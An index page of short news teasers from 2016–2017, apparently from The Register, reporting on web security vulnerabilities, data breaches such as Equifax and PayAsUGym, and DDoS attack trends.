Articles about web security

Litter

Finance sector is littered with vulns, and guess what – most can be resolved by patching

Security vulnerabilities across the finance sector have increased more than fivefold (418 per cent) in the last four years, according to a study by NCC Group. The most common high and medium-risk vulnerabilities were found in customer-facing web apps. NCC categorised vulnerabilities found in 168 financial services …
John Leyden, 22 Sep 2017
Data breach

Equifax UK admits: 400,000 Brits caught up in mega-breach

Equifax UK has surfaced to say that British systems were not affected by a recently disclosed megahack, however 400,000 UK people were affected due to a “process failure.” The credit reference agency is saying that UK dedicated systems were not affected by the security breach at its US parent firm that exposed the personal …
John Leyden, 15 Sep 2017

Defrosted starter for 10: Iceland home delivery site spills customer details

Iceland’s home delivery service exposed sensitive customer information for months until the problem was plugged this week, a UK security researcher discovered. Paul Moore went public with his findings after failing to get the retailer to act even 12 months after first reporting the issue. Public disclosure finally prompted …
John Leyden, 14 Sep 2017
you_fail_extended_648

Credit reference agencies faulted for poor patching

Updated Experian and Annual Credit Report.com – an organization set up by Equifax, Experian and Transunion to meet US consumer finance regulations – left themselves exposed to a serious vulnerability in Apache Struts earlier this year. The security shortcoming raises important questions following the disclosure of a mega-breach at …
John Leyden, 13 Sep 2017
Hipster with laptop photo via Shutterstock

Slack quick to whack account hijack crack

Slack quickly squashed a potential account hijack bug hours after it was reported. Frans Rosén, a security researcher at Detectify, discovered a vulnerability in Slack that created a means for a malicious website to steal a user's Slack token, potentially seizing control of their account in the process. Slack fixed the bug in …
John Leyden, 3 Mar 2017

Tricksy bugs in Zscaler admin portal let you ruin a coworker's day

Cloud management software peddler Zscaler has plugged cross-site scripting holes in the admin portal it provides to customers. People logged into the website could have exploited the bugs to inject malicious HTML and JavaScript into the browsers of other users of the site, allowing them to take over their accounts and perform …
John Leyden, 1 Mar 2017

Rasputin whips out large intimidating tool, penetrates uni, city, govt databases – new claim

A Russian-speaking miscreant dubbed "Rasputin," who potentially hacked into the US Election Assistance Commission and sold access to its systems, has struck again, it is claimed. Rasputin has allegedly infiltrated database servers within 60 organizations, US government agencies, and international universities. These victims …
John Leyden, 15 Feb 2017
Robots, image via Shutterstock

Battle of the botnets: My zombie horde's bigger than yours

DDoS attacks more than doubled in the last quarter of 2016 compared to the same period the year before. Although the infamous Mirai IoT botnets accounted for many of the most severe attacks, the biggest single assault came from a different zombie network, according to a new study by Akamai out Tuesday. Attacks greater than …
John Leyden, 14 Feb 2017

PayAsUGym breach exposes passwords

Fitness website PayAsUGym has been breached in a hack that may have exposed up to 400K emails and passwords. In a breach notice to users, the firm admitted one of its servers was hacked after “underground researchers” posted screenshots purporting to show PayAsUGym’s hacked database via Twitter. The 1x0123 hacker crew later …
John Leyden, 19 Dec 2016
AVSWinvote box

US voting machine certification agency probes potential hack

The US agency charged with ensuring that voting machines meet security standards may have been compromised, according to evidence uncovered by cyber security firm Recorded Future. In a statement, the EAC confirmed it was investigating a potential breach. EAC has become aware of a potential intrusion into an EAC web-facing …
John Leyden, 16 Dec 2016

Web security still outstandingly mediocre, experts report

Black Hat EU Cross-site scripting (XSS) vulnerabilities continue to dominate the list of most common vulnerabilities found in real-world tests. In more than a third (37 per cent) of cases, a website vulnerable to XSS is also vulnerable to a more critical flaw such as SQL injection or improper access control, according to web security …
John Leyden, 7 Nov 2016
couch_potato_remote_control_surfer

DDoSers do it more now, but they do it less fiercely*

The number of distributed denial of service attacks has doubled over the last 12 months. Akamai reports that Q2 saw a 129 per cent year-on-year increase in total DDoS attacks. During the second quarter, Akamai mitigated a total of 4,919 attacks, one of which (against a media company) reached an eye-watering 363n Gbps. Although …
John Leyden, 15 Sep 2016

DDoS protection biz Incapsula knackers its customers' websites

Glitches at distributed denial-of-service mitigation biz Incapsula left the websites it defends offline twice on Thursday. Incapsula blamed "connectivity issues" for the global PITSTOP, aka the worldwide degradation of its services. "A rare case triggered an issue on the Incapsula service and caused two system-wide errors at …
John Leyden, 10 Mar 2016

90% of SSL VPNs are ‘hopelessly insecure’, say researchers

Nine in 10 SSL VPNs use insecure or outdated encryption, putting corporate data at risk in the process, according to new research. High-Tech Bridge (HTB) conducted large-scale Internet research on live and publicly-accessible SSL VPN servers. The firm passively scanned 10,436 randomly selected publicly available SSL VPN …
John Leyden, 26 Feb 2016

Google punts freebie DDoS shield to hacks, human rights worthies

Google has launched a free service to protect news websites against DDoS attacks. Project Shield will also be offered to human rights and election monitoring websites as a way of fending off increasingly commonplace site-swamping DDoS assaults. Google is offering to "reverse proxy" qualifying websites' traffic through Google's …
John Leyden, 25 Feb 2016

Bacs corporate website still runs obsolete crypto

UK banking organisation Bacs is running a cryptographically obsolete website despite telling everyone else to upgrade before a June deadline. Earlier this week Bacs reminded UK businesses to update their systems and adopt SHA-2 before mid-June in order to avoid losing access to vital payment and money transfer services. …
John Leyden, 19 Feb 2016

Disney World-area University admits massive data breach

The University of Central Florida (UCF) has admitted that hackers who broke into its systems may have snaffled the personal details of more than 60,000 staff and students. The breach, discovered in early January but only made public on Thursday, exposed the social security numbers and other private information of 63,000 …
John Leyden, 5 Feb 2016
Bond on train Patrice Skyfall

Commuters slam UK rail operator c2c. You slow, late, er... privacy violator

Commuters in the south east of England, already angry about recent timetable changes and delays, have been further incensed by basic security blunders by rail operator c2c as it tried to placate passenger disquiet with a new compensation form on its website. The company, which operates rail service between London Fenchurch …
John Leyden, 25 Jan 2016

Create a news alert about web security, or find more stories about web security.

Biting the hand that feeds IT © 1998–2017